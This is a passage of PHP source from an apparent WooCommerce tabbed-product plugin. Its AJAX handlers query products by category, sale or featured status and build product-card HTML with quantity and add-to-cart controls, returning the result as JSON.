                        $step_qty = $response_min_max['step'];

                    $html .= ' <div class="qc_quantity">';
                    $html .= '<input class="qc_minus" type="button" value="-">           
                    <input id="qty_' . $product->get_id() . '" type="text" class="qc_product_quantity" name="qcld_quantity"  value="'.($min_qty ? $min_qty : 1).'" step="'.($step_qty ? $step_qty : '').'" min="'.($min_qty ? $min_qty : '').'" max="'.($max_qty ? $max_qty : '').'"><input class="qc_plus" type="button" value="+">';
                    }else{

                    $html .= ' <div class="qc_quantity">';
                    $html .= '<input class="qc_minus" type="button" value="-">           
                    <input id="qty_' . $product->get_id() . '" type="text" class="qc_product_quantity" name="qcld_quantity" value="1"><input class="qc_plus" type="button" value="+">';
                    }

                    endif;
                endif;

                if ($product->get_type() != 'variable'){
                    $qc_woo_tabbed_cart_summary = get_option('qc_woo_tabbed_cart_summary_position');
                    if(isset($qc_woo_tabbed_cart_summary) && $qc_woo_tabbed_cart_summary == 'wooinstantcart' ):

                        $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                        if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){

                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);
                        $min_qty  = $response_min_max['min'];
                        }else{
                        $min_qty  = 1;
                        }
                        $html .= ' <a  href="#"  class="ajax_add_to_cart add_to_cart_button product_type_simple qc-cart-btn" data-quantity="'.($min_qty ? $min_qty : 1).'" data-product_id="' . $product->get_id() . '" p-id="' . $product->get_id() . '"p-price="' . $product->get_price() . '" >' . $anchorText . '</a>';
                    else:
                    $html .= '<a id="' . $product->get_id() . '" data-p-id="' . $product->get_id() . '" data-p-price="' . $product->get_price() . '" href="' . $product->add_to_cart_url() . '" class="qc-cart-btn woo_tab_s_p_add_to_cart">' . $anchorText . '</a>';
                    endif;

                }else{
                    $html .= '<a href="#"  class="woo_tab_product_details" product-id="'.$product->get_id().'"> <i class="fa fa-cart-arrow-down" aria-hidden="true"></i> </a>';
                }

                $html .= '</div>';

            $qcld_woo_pro_minmax_dynamic_pricing_setting = get_option('qcld_woo_pro_minmax_dynamic_pricing_setting');

            if(function_exists('qcld_woo_pro_minmax_install') && (isset($qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off']) && $qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off'] == 'enable') ){

              $result_show = qcld_woo_pro_minmax_tabbed_dynamic_discount_price_table_show(get_the_ID());
              $html .= $result_show;
            }

                $html .= '</div>';

            } else {
               
                $html .= '<a id="' . $product->get_id() . '" data-p-id="' . $product->get_id() . '" data-p-price="' . $product->get_price() . '" href="#" class="qc-cart-btn">Out Of Stock</a>';

            }
        endif;

            
        $html .= '</li>';
    endwhile;
    wp_reset_query();
    $response = array(
        'cat_id' => $cat_id,
        'html' => $html,
        'offset' => $offset,
        'product_number' => $number_of_product
    );
    echo wp_send_json($response);
    wp_die();
}





// Ajax load products on tab for theme two

add_action('wp_ajax_get_products_by_cat_theme_two', 'get_products_by_cat_theme_two');
add_action('wp_ajax_nopriv_get_products_by_cat_theme_two', 'get_products_by_cat_theme_two');


function get_products_by_cat_theme_two()
{
    $post_per_page = get_option('product_number');
    $cat_id = $_POST['cat_id'];
    $offset = $_POST['offset'];
    $show_sale = $_POST['show_sale'];
    $show_feature = $_POST['feature_only'];
    

    $qc_shortcode_parameters    = $_POST['data_cat_parameter'];
    $category_ids    = $_POST['data_cat_parameter'];
    $link_title_to_modal = $_POST['link_title_to_modal'];

    $sorting = '';
    $orderBy = get_option('qc_product_sort_type');
    if(get_option('qc_product_sort_type') == 'meta_value_num'){
        $sorting = '_price';
    }
    if( get_option('qc_product_sort_type') == 'total_sales' ){
        $sorting = 'total_sales';
        $orderBy = 'meta_value_num';
    }

    if ($cat_id == 'all') {

        $show_featured_only = array('relation' => 'OR', array(
            array(
                'taxonomy' => 'product_visibility',
                'field' => 'name',
                'terms' => 'featured',
                'operator' => 'IN'
            )
        ));


        $show_sale_products_only = array('relation' => 'OR', array( // Simple products type
            'key' => '_sale_price',
            'value' => 0,
            'compare' => '>',
            'type' => 'numeric'
        ),
            array( // Variable products type
                'key' => '_min_variation_sale_price',
                'value' => 0,
                'compare' => '>',
                'type' => 'numeric'
            ));

        $product_categories = unserialize(get_option('selected_categories'));
        $product_number = get_option('product_number');

        $category_orders = get_option('category_order');

        if($category_orders == 'menu_order'){
            $args = array(
            'hide_empty'    => 1,
            'order'         => 'asc',
            'exclude'       => $product_categories,
            'include'       => $category_ids,
            );

        }else{

             $args = array(
            'hide_empty'    => 1,
            'order'         => get_option('category_order'),
            'orderby'       => 'title',
            'exclude'       => $product_categories,
            'include'       => $category_ids,
            );

        }
        $product_categories = get_terms('product_cat', $args);


        $categories_all = '';

        if (!empty($qc_shortcode_parameters) ) {
            $category_ids = $qc_shortcode_parameters;
            // convert the string into php array
            $categories_all = explode(',', $category_ids);

        } else {
            $categories_all = array();
            foreach($product_categories as $termss){
                array_push($categories_all,$termss->term_id);
            }
        }

         $args =  array_merge($args, array( 'tax_query' => array(
                            array(
                                'taxonomy' => 'product_visibility',
                                'field'    => 'name',
                                'terms'    => 'exclude-from-catalog',
                                'operator' => 'NOT IN',
                            ),
                    )));


        $args = array(
            'post_type'         => 'product',
            'posts_per_page'    => $post_per_page,
            'meta_key'          => $sorting,
            'orderby'           => $orderBy,
            'order'             => get_option('qc_product_sort_order'),
            'tax_query'         => array(
                'relation'      => 'OR',
                array(
                    'taxonomy'  => 'product_cat',
                    'field'     => 'term_id',
                    'terms'     => $categories_all,
                    'operator'  => 'IN'
                ),
            )
        );


        if ($show_sale == 1) {
            $args = array_merge($args, array('meta_query' => $show_sale_products_only));
        }

        if ($show_feature == 1) {

            $show_featured_only = array('relation' => 'OR', array(
                array(
                    'taxonomy' => 'product_cat',
                    'field' => 'term_id',
                    'terms' => $categories_all,
                    'operator' => 'IN'
                ),
                array(
                    'taxonomy' => 'product_visibility',
                    'field' => 'name',
                    'terms' => 'featured',
                    'operator' => 'IN'
                )
            ));
            $args = array_merge($args, array('tax_query' => $show_featured_only));
        }

       


    } else {


        $show_featured_only = array('relation' => 'OR', array(
            array(
                'taxonomy' => 'product_cat',
                'field' => 'term_id',
                'terms' => $cat_id,
                'operator' => 'IN'
            ),
            array(
                'taxonomy' => 'product_visibility',
                'field' => 'name',
                'terms' => 'featured',
                'operator' => 'IN'
            )
        ));


        $show_sale_products_only = array('relation' => 'OR', array( // Simple products type
            'key' => '_sale_price',
            'value' => 0,
            'compare' => '>',
            'type' => 'numeric'
        ),
            array( // Variable products type
                'key' => '_min_variation_sale_price',
                'value' => 0,
                'compare' => '>',
                'type' => 'numeric'
            ));

        $args = array(
            'post_type' => 'product',
            'post_status' => 'publish',
            'posts_per_page' => $post_per_page,
            'meta_key' => $sorting,
            'orderby' => $orderBy,
            'order' => get_option('qc_product_sort_order'),
//            'offset' => $offset,
            'tax_query' => array(
                'relation' => 'OR',
                array(
                    'taxonomy' => 'product_cat',
                    'field' => 'term_id',
                    'terms' => $cat_id,
                    'operator' => 'IN'
                ),
            )
        );

        if ($show_sale == 1) {
            $args = array_merge($args, array('meta_query' => $show_sale_products_only));
        }


        if ($show_feature == 1) {
            $args = array_merge($args, array('tax_query' => $show_featured_only));
        }

        $product_visibility = array('relation' => 'OR', array(
                array(
                    'taxonomy' => 'product_cat',
                    'field' => 'term_id',
                    'terms' => $cat_id,
                    'operator' => 'IN'
                ),
                 array(
                    'taxonomy' => 'product_visibility',
                    'field'    => 'name',
                    'terms'    => 'exclude-from-catalog',
                    'operator' => 'NOT IN',
                ),
            ));

        $args = array_merge($args, array('tax_query' => $product_visibility));


    }

    if(get_option('qc_woo_tabbed_disable_product_out_of_stock') == 'enable'){

        $args = array_merge($args, array( 'meta_query' => array(
                array(
                    'key'       => '_stock_status',
                    'value'     => 'instock',
                ),
        )));
    
    }

    if(class_exists('QCLD_WooCommerce_Role_Based_Price_Product_Pricing')){
        $rolebased = new QCLD_WooCommerce_Role_Based_Price_Product_Pricing(true);
        $rolebased->wc_init();
    }

    $product_query = new WP_Query($args);
    $wc_pf = new WC_Product_Factory();
    $html = '';

    while ($product_query->have_posts()) : $product_query->the_post();
        $product = wc_get_product(get_the_ID());
        $product_stock_status = $product->get_stock_status();
        
        $html .= '<li class="'.qcld_product_product_has_gallery( $product->get_id() ).'"><div class="product-box"><div class="product-img">';
        if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
            $html .='<a  href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'">';   
        }else{
            $html .='<a href="'. $product->get_permalink() .'">';  
        }
        $html .=  $product->get_image('shop_catalog') . qcld_product_second_product_thumbnail($product->get_id()). ' </a><div class="one-description">'. strip_tags(substr(get_the_excerpt(get_the_ID()), 0, 150), '<br>').'</div></div>';

        if ($product->is_on_sale()):
            $html .= '<label for="qc_on_sale"><img src="' . QC_WOO_TAB_IMAGE_URL . '/sale.png"></label>';
        endif;

        if (get_option('product_title') == 1):
            if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
            
                $html .= '<h2><a style="font-size: ' . get_option('change_title_text_size') . 'px; color: ' . get_option('product_title_text_color') . ';" href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'">' . $product->get_title() . '</a></h2>';
            }else{ 
                $html .= '<h2><a style="font-size: ' . get_option('change_title_text_size') . 'px; color: ' . get_option('product_title_text_color') . ';" href="' . $product->get_permalink() . '">' . $product->get_title() . '</a></h2>';
            }
        endif;
            if(get_option('qc_woo_tabbed_display_product_tag') == 'enable'){
            $html .= woo_tabbed_product_tags_by_id_ajax(get_the_ID());
            } 
        $average = $product->get_average_rating();

        if (get_option('display_rating') == 1):
            if ($average == 1) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/1_star.png" alt="">';
            } else if ($average == 0) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/no_star.png" alt="">';
            } else if ($average <= 2) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/2_star.png" alt="">';
            } else if ($average <= 3) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/3_star.png" alt="">';
            } else if ($average <= 4) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/4_star.png" alt="">';
            } else if ($average <= 5) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/5_star.png" alt="">';
            }
        endif;

        $html .= '<div class="product-bottom">';
        if (get_option('display_price') == 1):

            $html .= '<div style="font-size:' . get_option('product_content_text_size') . 'px; color: ' . get_option('product_content_text_color') . '" class="qc-woprice">' . $product->get_price_html() . '</div>';
        endif;


        $html .= '<div class="qc_quantity qc_qat_style_two">';

            if(get_option('qc_quick_view_on_off') != 'off'): 
            $html .= '<a href="#"  class="woo_tab_product_details" product-id="'.$product->get_id().'">
                    <i class="fa fa-info-circle" aria-hidden="true"></i></a>';
            endif; 
        if (get_option('add_quantity_select') == 1):
            if ($product_stock_status != 'outofstock'):
                if ($product->get_type() != 'variable'){

                    $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                    if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){
                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);

                        $min_qty  = $response_min_max['min'];
                        $max_qty  = $response_min_max['max'];
                        $step_qty = $response_min_max['step'];

                $html .= '<input class="qc_minus" type="button" value="-">
                <input type="text" class="qc_product_quantity"
                       name="qcld_quantity" value="'.($min_qty ? $min_qty : 1).'" step="'.($step_qty ? $step_qty : '').'" min="'.($min_qty ? $min_qty : '').'" max="'.($max_qty ? $max_qty : '').'">
                <input class="qc_plus" type="button" value="+">';

                }else{

                $html .= '<input class="qc_minus" type="button" value="-">
                <input type="text" class="qc_product_quantity"
                       name="qcld_quantity" value="1">
                <input class="qc_plus" type="button" value="+">';
                }

            }
            endif;
        endif;
        if (get_option('add_cart_link') == 1):
            if ($product_stock_status != 'outofstock') {

                if ($product->get_type() != 'variable'){
    
                    $qc_woo_tabbed_cart_summary = get_option('qc_woo_tabbed_cart_summary_position');
                    if(isset($qc_woo_tabbed_cart_summary) && $qc_woo_tabbed_cart_summary == 'wooinstantcart' ):

                        $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                        if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){

                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);
                        $min_qty  = $response_min_max['min'];
                        }else{
                        $min_qty  = 1;
                        }
                        $html .= ' <a  href="#"  class="ajax_add_to_cart add_to_cart_button product_type_simple qc-cart-btn woo_tab_s_p_add_to_cart" data-quantity="'.($min_qty ? $min_qty : 1).'" data-product_id="' . $product->get_id() . '" p-id="' . $product->get_id() . '"p-price="' . $product->get_price() . '" ><i
                        class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                    else:
                    $html .= '<a id="' . $product->get_id() . '" data-p-id="' . $product->get_id() . '" data-p-price="' . $product->get_price() . '" href="' . $product->add_to_cart_url() . '" class="qc-cart-btn woo_tab_s_p_add_to_cart"><i
                        class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                    endif;

                }else{
                    $html .= '<a  class="woo_tab_product_details" product-id="'.$product->get_id().'" href="#"><i class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                }



            } else {
                $html .= '<a class="product_out_of_stock" href="#"><i
                            class="fa"
                            aria-hidden="true"></i></a>';
            }
        endif;

        $html .= '<div class="clear"></div></div>';
                                           
            $qcld_woo_pro_minmax_dynamic_pricing_setting = get_option('qcld_woo_pro_minmax_dynamic_pricing_setting');

            if(function_exists('qcld_woo_pro_minmax_install') && (isset($qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off']) && $qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off'] == 'enable') ){

              $result_show = qcld_woo_pro_minmax_tabbed_dynamic_discount_price_table_show(get_the_ID());
              $html .= $result_show;
            }

        $html .= '</div> ';
    endwhile;
    wp_reset_query();
    $response = array(
        'cat_id' => $cat_id,
        'html' => $html,
        'offset' => $offset
    );
    echo wp_send_json($response);
    wp_die();

}


add_action('wp_ajax_get_products_by_cat_theme_one', 'get_products_by_cat_theme_one');
add_action('wp_ajax_nopriv_get_products_by_cat_theme_one', 'get_products_by_cat_theme_one');


function get_products_by_cat_theme_one()
{

    $post_per_page = get_option('product_number');
    $cat_id = $_POST['cat_id'];
    $offset = $_POST['offset'];
    $show_sale = $_POST['show_sale'];
    $show_feature = $_POST['feature_only'];

    $sorting = '';
    $orderBy = get_option('qc_product_sort_type');
    if(get_option('qc_product_sort_type') == 'meta_value_num'){
        $sorting = '_price';
    }
    if( get_option('qc_product_sort_type') == 'total_sales' ){
        $sorting = 'total_sales';
        $orderBy = 'meta_value_num';
    }

    if ($cat_id == 'all') {

        $show_featured_only = array('relation' => 'OR', array(
            array(
                'taxonomy' => 'product_visibility',
                'field' => 'name',
                'terms' => 'featured',
                'operator' => 'IN'
            )
        ));


        $show_sale_products_only = array('relation' => 'OR', array( // Simple products type
            'key' => '_sale_price',
            'value' => 0,
            'compare' => '>',
            'type' => 'numeric'
        ),
            array( // Variable products type
                'key' => '_min_variation_sale_price',
                'value' => 0,
                'compare' => '>',
                'type' => 'numeric'
            ));


        $product_categories = unserialize(get_option('selected_categories'));
        $product_number = get_option('product_number');

        $category_orders = get_option('category_order');

        if($category_orders == 'menu_order'){
            $args = array(
            'hide_empty'    => 1,
            'order'         => 'asc',
            'exclude'       => $product_categories,
            'include'       => $category_ids,
            );

        }else{

             $args = array(
            'hide_empty'    => 1,
            'order'         => get_option('category_order'),
            'orderby'       => 'title',
            'exclude'       => $product_categories,
            'include'       => $category_ids,
            );

        }
        $product_categories = get_terms('product_cat', $args);


        $categories_all = array();
        foreach($product_categories as $termss){
            array_push($categories_all,$termss->term_id);
        }


        $args = array(
            'post_type'         => 'product',
            'posts_per_page'    => $post_per_page,
            'meta_key'          => $sorting,
            'orderby'           => $orderBy,
            'order'             => get_option('qc_product_sort_order'),
            'tax_query'         => array(
                'relation'      => 'OR',
                array(
                    'taxonomy'  => 'product_cat',
                    'field'     => 'term_id',
                    'terms'     => $categories_all,
                    'operator'  => 'IN'
                ),
            )
        );


        if ($show_sale == 1) {
            $args = array_merge($args, array('meta_query' => $show_sale_products_only));
        }

        if ($show_feature == 1) {

            $show_featured_only = array('relation' => 'OR', array(
                array(
                    'taxonomy' => 'product_cat',
                    'field' => 'term_id',
                    'terms' => $categories_all,
                    'operator' => 'IN'
                ),
                array(
                    'taxonomy' => 'product_visibility',
                    'field' => 'name',
                    'terms' => 'featured',
                    'operator' => 'IN'
                )
            ));
            $args = array_merge($args, array('tax_query' => $show_featured_only));
        }

            $args =  array_merge($args, array( 'tax_query' => array(
                                array(
                                    'taxonomy' => 'product_visibility',
                                    'field'    => 'name',
                                    'terms'    => 'exclude-from-catalog',
                                    'operator' => 'NOT IN',
                                ),
                        )));


    } else {


        $show_featured_only = array('relation' => 'OR', array(
            array(
                'taxonomy' => 'product_cat',
                'field' => 'term_id',
                'terms' => $cat_id,
                'operator' => 'IN'
            ),
            array(
                'taxonomy' => 'product_visibility',
                'field' => 'name',
                'terms' => 'featured',
                'operator' => 'IN'
            )
        ));


        $show_sale_products_only = array('relation' => 'OR', array( // Simple products type
            'key' => '_sale_price',
            'value' => 0,
            'compare' => '>',
            'type' => 'numeric'
        ),
            array( // Variable products type
                'key' => '_min_variation_sale_price',
                'value' => 0,
                'compare' => '>',
                'type' => 'numeric'
            ));

        $args = array(
            'post_type' => 'product',
            'post_status' => 'publish',
            'posts_per_page' => $post_per_page,
            'meta_key' => $sorting,
            'orderby' => $orderBy,
            'order' => get_option('qc_product_sort_order'),
//            'offset' => $offset,
            'tax_query' => array(
                'relation' => 'OR',
                array(
                    'taxonomy' => 'product_cat',
                    'field' => 'term_id',
                    'terms' => $cat_id,
                    'operator' => 'IN'
                ),
            )
        );

        if ($show_sale == 1) {
            $args = array_merge($args, array('meta_query' => $show_sale_products_only));
        }


        if ($show_feature == 1) {
            $args = array_merge($args, array('tax_query' => $show_featured_only));
        }

        $product_visibility = array('relation' => 'OR', array(
                array(
                    'taxonomy' => 'product_cat',
                    'field' => 'term_id',
                    'terms' => $cat_id,
                    'operator' => 'IN'
                ),
                 array(
                    'taxonomy' => 'product_visibility',
                    'field'    => 'name',
                    'terms'    => 'exclude-from-catalog',
                    'operator' => 'NOT IN',
                ),
            ));

        $args = array_merge($args, array('tax_query' => $product_visibility));

    }

    if(get_option('qc_woo_tabbed_disable_product_out_of_stock') == 'enable'){

        $args = array_merge($args, array( 'meta_query' => array(
                array(
                    'key'       => '_stock_status',
                    'value'     => 'instock',
                ),
        )));
    
    }

    if(class_exists('QCLD_WooCommerce_Role_Based_Price_Product_Pricing')){
        $rolebased = new QCLD_WooCommerce_Role_Based_Price_Product_Pricing(true);
        $rolebased->wc_init();
    }


    $product_query = new WP_Query($args);
    $wc_pf = new WC_Product_Factory();
    $html = '';

    while ($product_query->have_posts()) : $product_query->the_post();
        $product = wc_get_product(get_the_ID());
        $product_stock_status = $product->get_stock_status();
        $html .= '<li class="'.qcld_product_product_has_gallery( get_the_ID() ).'"><div class="product-box"><div class="product-img">';
        if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
            $html .='<a  href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'">';   
        }else{
            $html .='<a href="'. $product->get_permalink() .'">';  
        }
        $html .=  $product->get_image('shop_catalog') .qcld_product_second_product_thumbnail(get_the_ID()) . '</a></div>';
        if ($product->is_on_sale()):
            $html .= '<label for="qc_on_sale"><img src="' . QC_WOO_TAB_IMAGE_URL . '/sale.png"></label>';
        endif;

        if (get_option('product_title') == 1):
            
            if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
                
                $html .= '<h2><a style="font-size: ' . get_option('change_title_text_size') . 'px; color: ' . get_option('product_title_text_color') . ';" href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'">' . $product->get_title() . '</a></h2>';
            }else{ 
                $html .= '<h2><a style="font-size: ' . get_option('change_title_text_size') . 'px; color: ' . get_option('product_title_text_color') . ';" href="' . $product->get_permalink() . '">' . $product->get_title() . '</a></h2>';
            }
        endif;
            if(get_option('qc_woo_tabbed_display_product_tag') == 'enable'){
            $html .= woo_tabbed_product_tags_by_id_ajax(get_the_ID());
            } 
        $average = $product->get_average_rating();

        if (get_option('display_rating') == 1):
            if ($average == 1) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/1_star.png" alt="">';
            } else if ($average == 0) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/no_star.png" alt="">';
            } else if ($average <= 2) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/2_star.png" alt="">';
            } else if ($average <= 3) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/3_star.png" alt="">';
            } else if ($average <= 4) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/4_star.png" alt="">';
            } else if ($average <= 5) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/5_star.png" alt="">';
            }
        endif;

        $html .= '<div class="product-bottom">';
        if (get_option('display_price') == 1):

            $html .= '<div style="font-size:' . get_option('product_content_text_size') . 'px; color: ' . get_option('product_content_text_color') . '" class="qc-woprice">' . $product->get_price_html() . '</div>';
        endif;


        $html .= '<div class="qc_quantity qc_qat_style_one">';

        if (get_option('add_quantity_select') == 1):
            if ($product_stock_status != 'outofstock'):
                 if ($product->get_type() != 'variable'){

                    $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                    if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){
                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);

                        $min_qty  = $response_min_max['min'];
                        $max_qty  = $response_min_max['max'];
                        $step_qty = $response_min_max['step'];

                    $html .= '<input class="qc_minus" type="button" value="-">
                    <input type="text" class="qc_product_quantity"
                           name="qcld_quantity" value="'.($min_qty ? $min_qty : 1).'" step="'.($step_qty ? $step_qty : '').'" min="'.($min_qty ? $min_qty : '').'" max="'.($max_qty ? $max_qty : '').'">
                    <input class="qc_plus" type="button" value="+">';

                    }else{
                    $html .= '<input class="qc_minus" type="button" value="-">
                    <input type="text" class="qc_product_quantity"
                           name="qcld_quantity" value="1">
                    <input class="qc_plus" type="button" value="+">';
                    }
                }
            endif;
        endif;
        if (get_option('add_cart_link') == 1):
            if ($product_stock_status != 'outofstock') {
                

                if ($product->get_type() != 'variable'){
              
                    $qc_woo_tabbed_cart_summary = get_option('qc_woo_tabbed_cart_summary_position');
                    if(isset($qc_woo_tabbed_cart_summary) && $qc_woo_tabbed_cart_summary == 'wooinstantcart' ):

                        $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                        if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){

                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);
                        $min_qty  = $response_min_max['min'];
                        }else{
                        $min_qty  = 1;
                        }
                        $html .= ' <a  href="#"  class="ajax_add_to_cart add_to_cart_button product_type_simple qc-cart-btn woo_tab_s_p_add_to_cart" data-quantity="'.($min_qty ? $min_qty : 1).'" data-product_id="' . $product->get_id() . '" p-id="' . $product->get_id() . '"p-price="' . $product->get_price() . '" ><i
                        class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                    else:
                    $html .= '<a id="' . $product->get_id() . '" data-p-id="' . $product->get_id() . '" data-p-price="' . $product->get_price() . '" href="' . $product->add_to_cart_url() . '" class="qc-cart-btn woo_tab_s_p_add_to_cart"><i
                        class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                    endif;

                }else{
                    $html .= '<a class="woo_tab_s_p_add_to_cart" href="' . $product->get_permalink() . '"><i class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                }
            } else {
                $html .= '<a class="product_out_of_stock" href="#"><i
                            class="fa"
                            aria-hidden="true"></i></a>';
            }
        endif;


        $html .= '</div >';

        $html .= '</div><div class="clear"></div></div>';
              
            $qcld_woo_pro_minmax_dynamic_pricing_setting = get_option('qcld_woo_pro_minmax_dynamic_pricing_setting');

            if(function_exists('qcld_woo_pro_minmax_install') && (isset($qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off']) && $qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off'] == 'enable') ){

              $result_show = qcld_woo_pro_minmax_tabbed_dynamic_discount_price_table_show(get_the_ID());
              $html .= $result_show;
            }
        $html .= '</div></li>';
    endwhile;
    wp_reset_query();
    $response = array(
        'cat_id' => $cat_id,
        'html' => $html,
        'offset' => $offset
    );
    echo wp_send_json($response);
    wp_die();

}






//Load more product for theme three
add_action('wp_ajax_woo_load_more_theme_four', 'qcld_wootab_woo_load_more_theme_four');
add_action('wp_ajax_nopriv_woo_load_more_theme_four', 'qcld_wootab_woo_load_more_theme_four');


function qcld_wootab_woo_load_more_theme_four(){

    $add_to_cart_text = get_option('change_add_to_cart_button_text');
    $show_per_page = get_option('product_number');
    $cat_id = $_POST['product_cat_id'];
    $offset = $_POST['offset'];
    $link_title_to_modal = $_POST['link_title_to_modal'];

    $sorting = '';
    $orderBy = get_option('qc_product_sort_type');
    if(get_option('qc_product_sort_type') == 'meta_value_num'){
        $sorting = '_price';
    }
    if( get_option('qc_product_sort_type') == 'total_sales' ){
        $sorting = 'total_sales';
        $orderBy = 'meta_value_num';
    }


    $args = array(
        'post_type' => 'product',
        'post_status' => 'publish',
        'offset' => $offset,
        'posts_per_page' => $show_per_page,
        'meta_key' => $sorting,
        'orderby' => $orderBy,
        'order' => get_option('qc_product_sort_order'),
        'tax_query' => array(
            'relation' => 'OR',
            array(
                'taxonomy' => 'product_cat',
                'field' => 'term_id',
                'terms' => $cat_id,
                'operator' => 'IN'
            ),
        )
    );

    if(get_option('qc_woo_tabbed_disable_product_out_of_stock') == 'enable'){

        $args = array_merge($args, array( 'meta_query' => array(
                array(
                    'key'       => '_stock_status',
                    'value'     => 'instock',
                ),
        )));
    
    }

    if(class_exists('QCLD_WooCommerce_Role_Based_Price_Product_Pricing')){
        $rolebased = new QCLD_WooCommerce_Role_Based_Price_Product_Pricing(true);
        $rolebased->wc_init();
    }

    $product_query = new WP_Query($args);
    $wc_pf = new WC_Product_Factory();

    $products_num = $product_query->post_count;
    if ($products_num == $show_per_page) {
        $nextOffset = intval($offset + $show_per_page);
    } else {
        $nextOffset = -1;
    }
    $html = '';

    $add_to_cart_text = get_option('change_add_to_cart_button_text');
    while ($product_query->have_posts()) : $product_query->the_post();
        $product = wc_get_product(get_the_ID());
        $product_stock_status = $product->get_stock_status();
        $html .= '<li class="'.qcld_product_product_has_gallery( get_the_ID() ).'" style="background-color:' . get_option('container_background_color') . '">
                                    <div class="qc-product-list">';
        if ($product->is_on_sale()):
            $html .= '<label for="qc_on_sale"><img src="' . QC_WOO_TAB_IMAGE_URL . '/sale.png"></label>';
        endif;
        $html .= '<div class="qc-product-details-left"><a href="'. $product->get_permalink() .'">' . $product->get_image('shop_catalog') .qcld_product_second_product_thumbnail(get_the_ID()) . '</a></div><div class="qc-product-details-right">';

        if (get_option('product_title') == 1):

            if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
            $html .= '<h2><a style="color: ' . get_option('product_title_text_color') . ';font-size: ' . get_option('change_title_text_size') . 'px;"href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'">' . $product->get_title() . '</a></h2>';
                 }else{ 
            $html .= '<h2><a style="color: ' . get_option('product_title_text_color') . ';font-size: ' . get_option('change_title_text_size') . 'px;" href="' . $product->get_permalink() . '">' . $product->get_title() . '</a></h2>';
                }
        endif;
        if( !empty(strip_tags($product->get_short_description()))){
        $html .= '<div class="tpl_four_short_desc" style="font-size: '.get_option('product_content_text_size').'px; color: '.get_option('product_content_text_color').' !important;">'.strip_tags($product->get_short_description()).'</div>';
        }

            if(get_option('qc_woo_tabbed_display_product_tag') == 'enable'){
            $html .= woo_tabbed_product_tags_by_id_ajax(get_the_ID());
            } 
                 
        $average = $product->get_average_rating();

        if (get_option('display_rating') == 1):
            $html .= '<div class="qcld_woo_product_rating">';
            if ($average == 1) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/1_star.png" alt="">';
            } else if ($average == 0) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/no_star.png" alt="">';
            } else if ($average <= 2) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/2_star.png" alt="">';
            } else if ($average <= 3) {
                $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/3_star.png" alt="">';
            } else if ($average <= 4) {
